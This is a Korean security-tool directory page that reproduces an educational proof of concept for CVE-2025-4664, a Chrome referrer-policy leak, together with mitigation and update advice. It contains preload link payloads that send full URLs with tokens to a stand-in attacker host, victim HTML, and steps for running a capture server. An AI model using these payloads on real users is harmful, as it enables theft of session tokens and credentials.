Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-4664 | Kitploit
도구/GitHubGitHub/speinador/cve-2025-4664
Vulnerability AnalysisExploitationInformation GatheringPhishingWeb SecurityLearning & Education
GitHubspeinador/cve-2025-4664

CVE-2025-4664

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔒 CVE-2025-4664 취약점

CVE-2025-4664 취약점은 Google Chrome 136.0.7103.113 이전 버전의 Loader 구성 요소에서 확인된 심각도가 높은 보안 결함입니다. 이 문제로 인해 원격 공격자는 특수하게 제작된 HTML 페이지를 통해 교차 출처(cross-origin) 데이터를 유출할 수 있으며, 세션 토큰이나 인증 자격 증명과 같은 민감한 정보가 손상될 수 있습니다.


❓ 이 취약점이란 무엇인가요?

이 결함은 Chrome의 Loader 구성 요소에서 보안 정책이 부적절하게 구현된 데서 비롯됩니다. 구체적으로 Chrome은 다른 브라우저에서는 적용되지 않는 상황에서도 하위 리소스(이미지 또는 스크립트 등) 요청 시 HTTP Link 헤더의 referrer-policy 지시문을 해석합니다. 공격자는 unsafe-url과 같이 덜 제한적인 정책을 설정하여 이 점을 악용할 수 있으며, 이로 인해 Chrome은 민감한 매개변수를 포함한 전체 URL을 공격자가 제어하는 도메인으로 유출하게 됩니다.


⚠️ 영향 및 활발한 악용

이 취약점은 실제 환경에서 활발히 악용되었으며, 이로 인해 미국 사이버보안 및 인프라 보안국(CISA)이 이를 KEV(알려지고 악용된 취약점 카탈로그)에 포함시켰습니다. CISA는 연방 기관이 해당 수정 사항을 적용해야 하는 기한을 2025년 6월 5일로 설정했습니다.


🛡️ 완화 조치 및 권장 사항

Google은 이 취약점을 수정하는 업데이트를 다음 버전으로 출시했습니다:

  • 🖥️ Windows 및 Mac: 136.0.7103.113/.114
  • 🐧 Linux: 136.0.7103.113

모든 사용자는 Chrome 브라우저를 사용 가능한 최신 버전으로 업데이트할 것을 강력히 권장합니다. 업데이트를 확인하고 적용하려면:

  1. 🔍 Chrome을 열고 오른쪽 상단 모서리에 있는 세 점 메뉴를 클릭합니다.
  2. ⚙️ "도움말"을 선택한 다음 "Chrome 정보"를 선택합니다.
  3. ⬇️ Chrome이 업데이트를 자동으로 확인하고 사용 가능한 경우 설치합니다.
  4. 🔄 업데이트 후 변경 사항을 적용하려면 브라우저를 다시 시작합니다.

또한 Microsoft Edge, Brave, Opera, Vivaldi와 같은 Chromium 기반 브라우저 사용자도 이 취약점의 영향을 받을 수 있으므로 해당 업데이트에 주의를 기울여야 합니다.

브라우저를 최신 상태로 유지하는 것은 활발한 보안 위협으로부터 보호하고 개인 정보를 안전하게 지키는 데 필수적입니다.


🕵️‍♂️ 어떻게 악용되나요?

CVE-2025-4664 취약점은 Google Chrome이 HTML 링크에서 하위 리소스(이미지, 스크립트 등)를 로드할 때 참조 정책(referrer-policy)을 처리하는 방식을 조작하여 악용됩니다.


⚙️ 기술적으로 어떻게 악용되나:

  1. 🌐 악성 사이트 생성:
    공격자는 HTTP 헤더에 다음과 같은 HTML 링크를 포함하는 웹사이트를 만듭니다:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 referrer-policy 조작: 대부분의 브라우저에서는 태그의 이 referrerpolicy가 로드된 리소스에 적용되지 않습니다. 그러나 Chrome은 이를 적용하며, 이것이 문제의 핵심입니다.

  3. 📤 Referer 유출: 피해자(Chrome)의 브라우저가 victima.com에서 리소스를 로드할 때 출처 사이트의 전체 URL을 Referer 헤더로 전송하며, 여기에는 다음이 포함될 수 있습니다:

  • 세션 토큰 (?token=ABC123)
  • 민감한 매개변수 (?user=admin&password=1234)
  • 개인 URL
  1. 🎯 공격자 서버에서 수신: 공격자는 리소스의 대상으로 자신이 제어하는 URL을 지정할 수 있습니다. 예:
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

피해자가 이 리소스에 접근하면 Chrome은 전체 URL을 Referer로 공격자 서버에 전송합니다.

  1. 🕵️ 정보 탈취: 공격자 서버는 HTTP 헤더를 기록하여 피해자 URL의 전체 내용을 획득합니다. 여기에는 기밀 데이터, 액세스 토큰 또는 내부 API URL이 포함될 수 있습니다.

✔️ 악용에 필요한 조건:

  • 👤 피해자가 패치되지 않은 Google Chrome을 사용해야 합니다.
  • 🔑 피해자 사이트의 URL에 인증 토큰과 같은 민감한 정보가 포함되어 있어야 합니다.
  • 🎣 공격자가 피해자의 브라우저가 자신의 도메인에서 리소스를 로드하도록 유도해야 합니다(예: 피싱, 악성 광고 또는 리디렉션을 통해).

🧪 실제 공격 예시(단순화):

1- 공격자가 피해자에게 다음 링크를 보냅니다:

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. 해당 페이지에서 다음과 같은 내용이 로드됩니다:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Chrome 브라우저가 다음을 전송합니다:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

공격자 도메인으로, 토큰이 노출됩니다.

프로필 사진

프로젝트 파일

🖥️ index.html — 피해자 파일

이 파일은 공격의 피해자를 시뮬레이션하며, 악성 태그를 사용하여 CVE-2025-4664 취약점을 악용하는 방법을 보여주는 단순화된 HTML 데모입니다:

  • 취약한 인터페이스를 나타냅니다.
  • 통제된 환경에서 취약점이 어떻게 작동하는지 시연하는 데 사용됩니다.
  • CVE-2025-4664에 따라 공격자가 악용할 수 있는 요소를 포함합니다.
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

이 코드가 하는 역할:

  • 태그는 URL에 토큰이 포함된 victima.com의 이미지를 사전 로드하도록 구성되어 있습니다.
  • referrerpolicy="unsafe-url"을 사용하면 Chrome은 현재 페이지의 전체 URL을 Referer로 피해자 도메인에 전송합니다.
  • 이미지가 공격자 자신의 서버를 가리키는 경우 공격자는 로그에서 해당 전체 URL을 캡처할 수 있습니다.

🐍 servidor_atacante.py — 공격자 파일

이 스크립트를 사용하면 Python 기반 소형 서버를 통해 Referer를 캡처하는 공격을 자동화할 수 있습니다. 다음은 데이터를 수신하는 공격자 서버를 시뮬레이션하기 위해 Flask를 사용한 예시입니다:

  • index.html로 표현된 피해자에 대한 공격을 시뮬레이션합니다.
  • 취약점에 설명된 기술을 구현합니다.
  • 구현된 완화 조치를 테스트하고 검증하는 데 사용됩니다.

사용 방법:

  1. 해당 코드를 servidor_atacante.py로 저장합니다.
  2. Flask가 없다면 설치합니다:
root@kitploit:~
pip install flask
  1. 서버를 실행합니다:
root@kitploit:~
python servidor_atacante.py
  1. 그런 다음 HTML 데모를 다음과 같이 수정합니다:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

스크립트를 실행하는 서버의 공인 IP 또는 로컬 IP로 <tu_IP>를 바꾸세요.


💪 프로젝트 사용 방법

🛠️ 1. Flask 서버 실행하기

  1. 터미널(PowerShell 또는 CMD)을 엽니다.

  2. 파일이 있는 폴더로 이동합니다:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Flask를 실행합니다:
root@kitploit:~
python servidor_atacante.py
  1. 다음과 같은 출력이 표시됩니다:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. index.html 생성 및 열기(피해자 시뮬레이션)

같은 폴더(C:\Users\Sebas\Desktop\servidor_atacante)에 다음 내용으로 index.html이라는 파일을 만듭니다:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ 중요: IP(192.168.1.35)가 Flask가 로컬 IP로 표시하는 주소와 일치하는지 확인하세요. 다르다면 HTML에서 변경하세요.

🚀 3. 민감한 매개변수를 포함한 index.html 열기

  1. Chrome을 엽니다.

  2. 주소 표시줄에 다음을 입력합니다:

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. Enter 키를 누릅니다.

  2. 📥 서버에서 결과 확인하기 Flask 콘솔에서 다음과 같은 내용이 표시되어야 합니다:

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Carpeta destino]: 파일이 저장된 위치에 따라 이 매개변수를 수정하세요.

🎯 브라우저가 전체 Referer를 공격자에게 전송했다는 뜻입니다!


🧑‍🏫 저자

공격적 사이버보안에 대한 교육 및 연구 목적으로 Sebastian Peinador가 작성한 설명입니다.


📄 라이선스

이 자료는 MIT 라이선스에 따라 배포됩니다.


유용하게 여겨지신다면, ⭐를 눌러 리포지토리를 응원하거나 공유하는 것을 잊지 마세요!

도구 다운로드